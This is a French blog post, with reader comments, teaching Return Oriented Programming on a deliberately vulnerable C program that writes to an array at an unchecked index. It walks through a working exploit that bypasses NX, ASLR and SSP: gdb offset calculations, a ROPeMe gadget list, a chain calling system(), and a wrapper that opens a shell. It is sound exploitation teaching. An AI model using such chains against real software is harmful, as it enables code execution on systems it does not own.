mercredi 3 novembre 2010

ROPoc

Hola! Ca fesait un moment que j'étais pas venu faire un truc ici :]

J'avais envie de faire un mini introduction au Return Oriented Programming:

Considérons le code suivant :

#include <stdio.h>

void insert(int offset,int value,int * tab)
{
printf("Tab Address : %p\n",tab);
printf("WAdress :%p\n",tab+offset);
tab[offset]=value;
}

int main(int argc, char ** argv)
{
if(argc<2)
{
printf("\t Usage:%s <file>\n",argv[0]);
}
else
{

FILE * f=0;
int c;
int o;
int tab[1024];
char temp[20];

memset(tab,0,1024*sizeof(int));

f=fopen(argv[1],"r");

if(f!=NULL)
{
while (fgets(temp,20,f))
{

c=atoll(temp);

fgets(temp,20,f);

o=atoll(temp);

if(c!=0 && o!=0)
{
printf("\nWill Write %i(%x) \
at Offset %i\n",c,c,o);

insert(o,c,tab);
}
}
}
}
return 0;
}

Le binaire est disponible ici : http://repo.zenk-security.com/sm0k/Trash/poc

Aucune option de compilation n'est ajoutée, le noyau utilisé est le suivant:

wiid sm0k # uname -r
2.6.34-gentoo-r6

On utilise checksec.sh pour connaitre les mitigations activées :

sm0k@wiid ~ $ ./checksec.sh --file poc
RELRO STACK CANARY NX PIE FILE
Partial RELRO No canary found NX enabled No PIE poc

L'ASLR est activé, la GOT n'est potentiellement pas inscriptible (RELRO), le SSP n'est pas utilisé (nous aurions pu l'activer, cela n'aurait posé aucun problème pour l'exploitation qui va suivre), la pile n'est pas exécutable (exploitation par shellcode impossible), et enfin la section .text est fixe en mémoire (PIE désactivé).

Nous allons donc bypasser ASLR, NX Bit, RELRO, et SSP, tout ca a la fois :p

Le programme lit le fichier dont le nom est passé en argument ligne par ligne et stocke la représentation entière de la valeur en ligne 1 a la position x du tableau tab, x étant la valeur de la ligne 2.

Le programme boucle jusqu'à ce qu'il n'y ai plus de lignes dans le fichier.

On est ici clairement face à un débordement de tampon classique, qui de plus nous permet de bypasser le SSP puisqu'on peut réécrire saved eip sans écraser le canary.

Pour ceux qui ne l'avaient pas encore repéré la vulnérabilité est la :

tab[offset]=value;


Il aurait fallu vérifier que la valeur d'offset ne dépasse pas (taille tableau -1) à savoir 1023.

Débugguons

On pose un point d'arret au début de main, ainsi on sait facilement ou est stocké Saved EIP sur la pile (Attention on travaille avec des adresse réelles pour les calculs tant qu'on reste dans la meme instance de gdb, si on le redémarre il faudra tout recommencer.)

sm0k@wiid ~ $ gdb poc

(gdb) b *main+0
Breakpoint 1 at 0x804851a
(gdb) run
Starting program: /home/sm0k/poc

Breakpoint 1, 0x0804851a in main ()
(gdb) x/x $esp
0xbffff42c: 0xb7eacbb6


L'adresse du buffer qu'on controle, ici le tableau tab nous est donnée par le programme, mais on aurait pu la déterminer facilement en regardant les arguments passés a insert(): 0xbfffe460

On va maintenant calculer le décalage entre le début de tab et Saved EIP sur la pile :

donc 0xbffff42c - 0xbfffe460 = 0x102c = 4140

Etant donné qu'on travaille avec des int, on divise par 4 : 4140/4 = 1035

Il est donc possible de rediriger le flux d'instruction du programme en écrasant Saved EIP en écrivant à tab[1035]. W00t! :)

On va donc essayer de réécrire saved eip par 0x41414141 (1094795585 base 10), ce qui nous donne le fichier suivant:
(Souvenez vous, la première ligne contient la valeur à écrire et la seconde son offset par rapport a tab)

sm0k@wiid ~ $ cat t
1094795585
1035


On test :

(gdb) r t
Starting program: /root/poc t

Will Write 1094795585(41414141) at Offset 1035
Tab Address : 0xbfffe460
WAdress :0xbffff48c

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)


Bingo!

Bon on va voir comment exploiter ca maintenant...

On prend déja les infos nécessaires :

sm0k@wiid ~ $ cat /proc/self/maps
08048000-08051000 r-xp 00000000 08:03 444485 /bin/cat
08051000-08052000 r--p 00008000 08:03 444485 /bin/cat
08052000-08053000 rw-p 00009000 08:03 444485 /bin/cat
08053000-08074000 rw-p 00000000 00:00 0 [heap]
b759c000-b759d000 rw-p 00000000 00:00 0
b759d000-b76dd000 r-xp 00000000 08:03 412168 /lib/libc-2.11.2.so
b76dd000-b76df000 r--p 0013f000 08:03 412168 /lib/libc-2.11.2.so
b76df000-b76e0000 rw-p 00141000 08:03 412168 /lib/libc-2.11.2.so
b76e0000-b76e3000 rw-p 00000000 00:00 0
b76e7000-b76e8000 rw-p 00000000 00:00 0
b76e8000-b76e9000 r-xp 00000000 00:00 0 [vdso]
b76e9000-b7705000 r-xp 00000000 08:03 412117 /lib/ld-2.11.2.so
b7705000-b7706000 r--p 0001b000 08:03 412117 /lib/ld-2.11.2.so
b7706000-b7707000 rw-p 0001c000 08:03 412117 /lib/ld-2.11.2.so
bfd18000-bfd3a000 rw-p 00000000 00:00 0 [stack]

sm0k@wiid ~ $ cat /proc/self/maps
08048000-08051000 r-xp 00000000 08:03 444485 /bin/cat
08051000-08052000 r--p 00008000 08:03 444485 /bin/cat
08052000-08053000 rw-p 00009000 08:03 444485 /bin/cat
08053000-08074000 rw-p 00000000 00:00 0 [heap]
b7765000-b7766000 rw-p 00000000 00:00 0
b7766000-b78a6000 r-xp 00000000 08:03 412168 /lib/libc-2.11.2.so
b78a6000-b78a8000 r--p 0013f000 08:03 412168 /lib/libc-2.11.2.so
b78a8000-b78a9000 rw-p 00141000 08:03 412168 /lib/libc-2.11.2.so
b78a9000-b78ac000 rw-p 00000000 00:00 0
b78b0000-b78b1000 rw-p 00000000 00:00 0
b78b1000-b78b2000 r-xp 00000000 00:00 0 [vdso]
b78b2000-b78ce000 r-xp 00000000 08:03 412117 /lib/ld-2.11.2.so
b78ce000-b78cf000 r--p 0001b000 08:03 412117 /lib/ld-2.11.2.so
b78cf000-b78d0000 rw-p 0001c000 08:03 412117 /lib/ld-2.11.2.so
bfe35000-bfe57000 rw-p 00000000 00:00 0 [stack]


l'ASLR est bien activé partout(on peut le voir car les adresses 'bougent' d'une fois sur l'autre) sauf sur les sections .text et heap (le tas).
La pile n'est pas executable (Flag x non présent).

Bon ca nous facilite pas la tache comme vous pouvez le constater :)

Il reste une solution : le Return Oriented Programming.

Le principe est de rechercher dans les sections exécutables (et non touchées par l'ASLR) des "gadgets", qui sont en fait des petites portions de code directement suivies par un ret (ce qui nous permettra donc d'enchainer les gadgets).

On utilisera ensuite ces gadgets pour constituer une sorte de shellcode.

Dans la pratique, notre chaine d'exploitation ne contiendra que les adresses de nos gadgets, et donc pas d'opcodes (IDS-Safe ?! :D )

On va utiliser l'outil ROPEME pour ca:

ROPeMe> generate /home/sm0k/poc
Generating gadgets for /home/sm0k/poc with backward depth=3
It may take few minutes depends on the depth and file size...
Processing code block 1/1
Generated 66 gadgets
Dumping asm gadgets to file: poc.ggt ...
OK

ROPeMe> load poc.ggt
Loading asm gadgets from file: poc.ggt ...
Loaded 66 gadgets
ELF base address: 0x8048000
OK


Et voila nos gadgets :

ROPeMe> search %
Searching for ROP gadget: % with constraints: []
0x8048512L: adc [ebx+0x10890c55] cl | leave |
0x8048517L: adc cl cl |
0x804867eL: add [eax] al | add [eax] al | leave |
0x804842dL: add [eax] al | add [ebx-0x7f] bl |
0x8048735L: add [eax] al | add [ebx-0x7f] bl |
0x804867fL: add [eax] al | add cl cl |
0x8048373L: add [eax] al | leave |
0x8048680L: add [eax] al | leave |
0x804849eL: add [ebx+0x5d5b04c4] eax |
0x804842fL: add [ebx-0x7f] bl |
0x8048737L: add [ebx-0x7f] bl |
0x80484a1L: add al 0x5b | pop ebp |
0x8048726L: add al 0x5b | pop ebp |
0x804849cL: add al 0x8 | add [ebx+0x5d5b04c4] eax |
0x80484cdL: add al 0x8 | call eax | leave |
0x8048374L: add cl cl |
0x8048681L: add cl cl |
0x8048499L: add eax 0x804a024 | add [ebx+0x5d5b04c4] eax |
0x8048440L: add eax 0xffff42e8 | call far dword [eax+0x5b] | leave |
0x8048372L: add eax [eax] | add cl cl |
0x804849fL: add esp 0x4 | pop ebx | pop ebp |
0x8048724L: add esp 0x4 | pop ebx | pop ebp |
0x804849aL: and al 0xa0 | add al 0x8 | add [ebx+0x5d5b04c4] eax |
>0x80484cfL: call eax | leave |
0x8048445L: call far dword [eax+0x5b] | leave |
0x8048743L: call far dword [ecx+0x5b] | leave |
0x80486f1L: fiadd word [ebx+0x5e5b1cc4] | pop edi | pop ebp |
0x8048511L: inc ebp | adc [ebx+0x10890c55] cl | leave |
0x8048677L: jnz 0x80485a1 | mov eax 0x0 | leave |
0x8048375L: leave |
0x8048448L: leave |
0x80484d1L: leave |
0x8048516L: mov [eax] edx | leave |
0x80484c8L: mov dword [esp] 0x8049f1c | call eax | leave |
0x804867dL: mov eax 0x0 | leave |
0x8048371L: mov eax [ebx] | add [eax] al | leave |
0x8048691L: mov ebp esp | pop ebp |
0x80486faL: mov ebx [esp] |
0x8048513L: mov edx [ebp+0xc] | mov [eax] edx | leave |
0x8048515L: or al 0x89 | adc cl cl |
>0x8048446L: pop eax | pop ebx | leave |
0x80484ceL: or bh bh | ror cl 0x1 |
0x80486f8L: pop ebp | ret | mov ebx [esp] |
0x80484a3L: pop ebp |
0x8048693L: pop ebp |
0x80486f8L: pop ebp |
0x8048447L: pop ebx | leave |
0x8048745L: pop ebx | leave |
0x80484a2L: pop ebx | pop ebp |
0x8048727L: pop ebx | pop ebp |
0x8048744L: pop ecx | pop ebx | leave |
0x80486f7L: pop edi | pop ebp |
0x80486f6L: pop esi | pop edi | pop ebp |
0x8048690L: push ebp | mov ebp esp | pop ebp |
0x8048514L: push ebp | or al 0x89 | adc cl cl |
0x80486f9L: ret | mov ebx [esp] |
0x80484d0L: ror cl 0x1 |
0x80486fbL: sbb al 0x24 |


On va maintenant récupérer l'adresse de system() qui va nous servir pour notre "shellcode" :

(gdb) x/x system
0xb7ecd520 : 0x83e58955


Notre "Shellcode" au final :

  1. 134513734 ; pop eax ; pop ebx ; leave // on récupere le prochain mot sur la pile donc l'addresse de la fonction system() pour nous. (0x8048446 en base 10)

  2. 3085751584 ; @system // L'adresse de system qu'on a récupéré (0xb7ecd520 en base 10)

  3. 134513871 ; call eax // On saute sur eax , qui contient l'adresse de system (0x8048446 en base 10)


Et la on test, et tout ne se passe pas très bien. Le problème est rapidement détecté : l'instruction leave (épilogue d'une fonction servant a restituer la pile, dans son état original, a la fonction apellante) réajuste la pile en réinitialisant le pointeur de base de pile (ebp) à la valeure actuelle d'esp (pointeur de pile). L'instruction récupère ensuite la valeur de saved ebp sur la pile, et la dépose dans ebp.

Notre pointeur de pile est donc décalé, et l'exploitation foire, vu que le call eax n'est jamais apellé :(.
Un petit calcul s'impose donc!

Trouvons tout d'abord la valeur vers laquelle pointe la pile après le leave (en débuggant ou par calcul): 0xbffff50c

Calcul de l'offset à utiliser pour ècrire à cette adresse: 0xbffff50c - 0xbfffe460 = 4268/4 = 1067

1067 Sera donc l'offset à utiliser, mettons à jour l'exploit:

134513734
1035
3085751584
1036
134513871
1067 // Notre nouvel offset


Testons à nouveau:

Starting program: /home/sm0k/poc t

Will Write 134513734(8048446) at Offset 1035
Tab Address : 0xbfffe460
WAdress :0xbffff48c

Will Write -1209215712(b7ecd520) at Offset 1036
Tab Address : 0xbfffe460
WAdress :0xbffff490

Will Write 134513871(80484cf) at Offset 1067
Tab Address : 0xbfffe460
WAdress :0xbffff50c
sh: Uåäðì0: command not found

Program received signal SIGSEGV, Segmentation fault.
0x080484d1 in _start ()
(gdb)


ow :] ca fonctionne, donc :)


sh: Uåäðì0: command not found


Comme on n'a pas passé d'argument à system(), il prend ce qu'il trouve en premier sur la pile, ici "Uåäðì0: ".

Bon on peut toujours utiliser le vieux trick qui consiste a créer un wrapper apellé "Uåäðì0 " ... Mais on va quand meme essayer de controler l'input de system()...

On va explorer les section non randomizées et essayer de trouver une chaine...

(gdb) maintenance info sections
Exec file:
`/home/sm0k/poc', file type elf32-i386.
0x8048154->0x8048167 at 0x00000154: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048168->0x8048188 at 0x00000168: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048188->0x80481c0 at 0x00000188: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80481c0->0x80481e0 at 0x000001c0: .gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80481e0->0x8048270 at 0x000001e0: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048270->0x80482df at 0x00000270: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80482e0->0x80482f2 at 0x000002e0: .gnu.version ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80482f4->0x8048324 at 0x000002f4: .gnu.version_r ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048324->0x804832c at 0x00000324: .rel.dyn ALLOC LOAD READONLY DATA HAS_CONTENTS
0x804832c->0x8048364 at 0x0000032c: .rel.plt ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048364->0x804837b at 0x00000364: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
0x804837c->0x80483fc at 0x0000037c: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
0x8048400->0x804872c at 0x00000400: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
0x804872c->0x8048748 at 0x0000072c: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
0x8048748->0x80487a9 at 0x00000748: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80487ac->0x80487b0 at 0x000007ac: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8049f0c->0x8049f14 at 0x00000f0c: .ctors ALLOC LOAD DATA HAS_CONTENTS
0x8049f14->0x8049f1c at 0x00000f14: .dtors ALLOC LOAD DATA HAS_CONTENTS
0x8049f1c->0x8049f20 at 0x00000f1c: .jcr ALLOC LOAD DATA HAS_CONTENTS
0x8049f20->0x8049ff0 at 0x00000f20: .dynamic ALLOC LOAD DATA HAS_CONTENTS
0x8049ff0->0x8049ff4 at 0x00000ff0: .got ALLOC LOAD DATA HAS_CONTENTS
0x8049ff4->0x804a01c at 0x00000ff4: .got.plt ALLOC LOAD DATA HAS_CONTENTS
0x804a01c->0x804a024 at 0x0000101c: .data ALLOC LOAD DATA HAS_CONTENTS
0x804a024->0x804a02c at 0x00001024: .bss ALLOC
0x0000->0x0022 at 0x00001024: .comment READONLY HAS_CONTENTS


Ceci :

0x8048174: "GNU"


sera parfait. On met l'exploit a jour...

134513734
1035
3085751584
1036
134513871
1067
134513012 //Adresse de la chaine "GNU" (0x8048174 en base 10)
1068


On crée un wrapper:

sm0k@wiid ~ $ echo "/bin/sh" > GNU && chmod +x GNU && export PATH=/home/sm0k:$PATH


Et on retest:

Starting program: /home/sm0k/poc t

Will Write 134513734(8048446) at Offset 1035
Tab Address : 0xbfffe400
WAdress :0xbffff42c

Will Write -1209215712(b7ecd520) at Offset 1036
Tab Address : 0xbfffe400
WAdress :0xbffff430

Will Write 134513871(80484cf) at Offset 1067
Tab Address : 0xbfffe400
WAdress :0xbffff4ac

Will Write 134513012(8048174) at Offset 1068
Tab Address : 0xbfffe400
WAdress :0xbffff4b0
sh-4.1$ echo "owi"
owi


Et Poc!

Conclusion

  • Ici ca reste irréaliste :(. La chaine "GNU" dèja, c'est pas super reliable... Mais sur un programme de plus grande taille on a quand meme des chances de trouver plus pratique.
  • L'adresse de system() vient de la libc, qui est randomizée :( On pourrait peut être envisager un shellcode qui réécrit la GOT si on avait assez de gadgets? Si le programme était plus grand, on trouverais facilement une alternative à system() dans la section .text qui elle, n'est pas randomizée. C'est aussi possible que cette solution soit dans le programme mais que je l'ai pas vue!!
  • Eviter les leaves, ou alors en fin de shellcode...
Vos commentaires sont les bienvenus!

4 commentaires:

Mysterie a dit…

Lut, bel article :)

Il est possible de retrouver l'adresse de system en passant par la GOT grâce à des gadgets comme :
add 0xf475fff8(%ebx),%eax
ret

Et donc qui dit adresse de system dit adresse de chaine tel que "bin/sh" dans les rodata.

L'inconvénient c'est qu'on se base sur des offsets donc l'exploit est à refaire pour chaque version de la libc.

Un article qui en parle : http://divine-protection.com/tc/34

Warr a dit…

Bon petit article, j'attends avec impatience un exploit en situation réelle. Tu dois pouvoir nous trouver ça ;)

Anonyme a dit…

Joli taff ;) Mais y'a un truc qui coince.
le code de départ ne fonctionne pas correctement chez moi.
atoll renvoi toujours 0 donc pas moyen d'entrer dans la fonction insert.
un ltrace montre qu'atoll prend 4 arguments ??!
atoll(0xbfac2ca4, 20, 0x9b04008, 0, 0xbfac2ce0)

pourtant la man dit:
long long atoll(const char *str);

Je comprend pas, need help plz

sm0k a dit…

Bonne question, c'est bizarre!

Essaye peut-etre avec strtol :

http://www.cplusplus.com/reference/clibrary/cstdlib/strtol/